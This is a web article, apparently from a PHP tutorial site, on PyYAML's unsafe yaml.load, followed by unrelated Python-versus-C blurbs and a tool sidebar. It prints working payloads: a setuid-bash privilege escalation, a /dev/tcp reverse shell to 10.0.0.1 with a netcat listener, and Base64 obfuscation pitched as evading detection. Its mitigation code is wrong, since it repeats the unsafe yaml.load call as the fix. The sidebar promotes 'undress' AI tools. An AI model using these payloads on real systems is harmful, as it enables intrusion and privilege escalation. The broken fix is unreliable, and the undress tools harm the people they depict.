


The YAML (YAML Ain't Markup Language) library in Python has been identified as having vulnerabilities that allow the execution of arbitrary commands under certain conditions. The vulnerability arises from the use of the yaml.load function without specifying a safe loader. By default, yaml.load can execute arbitrary Python objects, which creates an attack surface for malicious payloads.
Exploitation via Arbitrary Command Execution
The fundamental risk lies in the deserialization process. When a YAML document contains a malicious payload, yaml.load processes the embedded directives, potentially leading to code execution. For example, consider the following snippet:
import yaml filename = "example.yml" data = open(filename, 'r').read() yaml.load(data) # Unsafe usage
Here, the yaml.load function parses example.yml without restrictions, making it vulnerable if the YAML content includes unsafe directives. A typical exploit payload can be crafted to execute arbitrary system commands.
Example Payload
import yaml from yaml import Loader, UnsafeLoader # Malicious payload payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]' # Exploitation yaml.load(payload) yaml.load(payload, Loader=Loader) yaml.load(payload, Loader=UnsafeLoader)
Each of these invocations processes the payload, resulting in the creation of a privileged executable in /tmp/bash. This binary can then be executed with elevated privileges:
/tmp/bash -p
This demonstrates the potential for privilege escalation if the vulnerability is exploited on a system with misconfigured permissions or other weaknesses.
Reverse Shell Exploitation
A particularly insidious use case is leveraging the vulnerability for a reverse shell. This allows attackers to gain remote access to the target machine. The process involves starting a listener on the attacker's machine and crafting a YAML document designed to establish the reverse connection.
On the attacker's machine, initiate a Netcat listener:
nc -lvnp 1234
On the target system, execute the following Python script as root:
import yaml # Reverse shell payload data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]' yaml.load(data) # Executes the reverse shell
This payload instructs the target machine to connect back to the attacker's listener, providing a fully interactive shell with the privileges of the executing process.
Base64 Encoding for Obfuscation
To bypass basic security controls or filters, the payload can be Base64-encoded. This method adds a layer of obfuscation, potentially evading detection by static analysis tools.
Example
from base64 import b64decode import yaml # Base64-encoded payload encoded_payload = b"ISFweXRa...YXNoIl0=" # Truncated for brevity payload = b64decode(encoded_payload) # Execute the payload yaml.load(payload)
Mitigation Techniques
Professionals must adopt strict coding practices to eliminate such vulnerabilities. Recommended mitigations include:
-
Using Safe Loaders: Replace yaml.load with yaml.safe_load, which prevents the execution of arbitrary objects.
import yaml filename = "example.yml" data = open(filename, 'r').read() yaml.load(data) # Unsafe usage
Restricting Input Sources: Ensure YAML inputs are sanitized and originate only from trusted sources.
Applying Static Analysis: Use tools to scan codebases for unsafe yaml.load invocations.
Environment Hardening: Restrict system permissions to minimize the impact of exploitation. For example, using containerized environments limits an attacker's ability to escalate privileges.
The YAML library’s default behavior exemplifies the risks associated with deserialization in dynamically typed languages like Python. Exploiting this vulnerability requires minimal sophistication, making it a high-priority issue for secure application development. Adopting safe coding practices, along with robust input validation and runtime safeguards, is imperative to mitigate these risks effectively.
The above is the detailed content of Be Careful When Using YAML in Python! There May Be Security Vulnerabilities. For more information, please follow other related articles on the PHP Chinese website!

Python is easier to learn and use, while C is more powerful but complex. 1. Python syntax is concise and suitable for beginners. Dynamic typing and automatic memory management make it easy to use, but may cause runtime errors. 2.C provides low-level control and advanced features, suitable for high-performance applications, but has a high learning threshold and requires manual memory and type safety management.

Python and C have significant differences in memory management and control. 1. Python uses automatic memory management, based on reference counting and garbage collection, simplifying the work of programmers. 2.C requires manual management of memory, providing more control but increasing complexity and error risk. Which language to choose should be based on project requirements and team technology stack.

Python's applications in scientific computing include data analysis, machine learning, numerical simulation and visualization. 1.Numpy provides efficient multi-dimensional arrays and mathematical functions. 2. SciPy extends Numpy functionality and provides optimization and linear algebra tools. 3. Pandas is used for data processing and analysis. 4.Matplotlib is used to generate various graphs and visual results.

Whether to choose Python or C depends on project requirements: 1) Python is suitable for rapid development, data science, and scripting because of its concise syntax and rich libraries; 2) C is suitable for scenarios that require high performance and underlying control, such as system programming and game development, because of its compilation and manual memory management.

Python is widely used in data science and machine learning, mainly relying on its simplicity and a powerful library ecosystem. 1) Pandas is used for data processing and analysis, 2) Numpy provides efficient numerical calculations, and 3) Scikit-learn is used for machine learning model construction and optimization, these libraries make Python an ideal tool for data science and machine learning.

Is it enough to learn Python for two hours a day? It depends on your goals and learning methods. 1) Develop a clear learning plan, 2) Select appropriate learning resources and methods, 3) Practice and review and consolidate hands-on practice and review and consolidate, and you can gradually master the basic knowledge and advanced functions of Python during this period.

Key applications of Python in web development include the use of Django and Flask frameworks, API development, data analysis and visualization, machine learning and AI, and performance optimization. 1. Django and Flask framework: Django is suitable for rapid development of complex applications, and Flask is suitable for small or highly customized projects. 2. API development: Use Flask or DjangoRESTFramework to build RESTfulAPI. 3. Data analysis and visualization: Use Python to process data and display it through the web interface. 4. Machine Learning and AI: Python is used to build intelligent web applications. 5. Performance optimization: optimized through asynchronous programming, caching and code

Python is better than C in development efficiency, but C is higher in execution performance. 1. Python's concise syntax and rich libraries improve development efficiency. 2.C's compilation-type characteristics and hardware control improve execution performance. When making a choice, you need to weigh the development speed and execution efficiency based on project needs.


Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Hot Tools

MinGW - Minimalist GNU for Windows
This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.

WebStorm Mac version
Useful JavaScript development tools

mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),

DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software

SecLists
SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.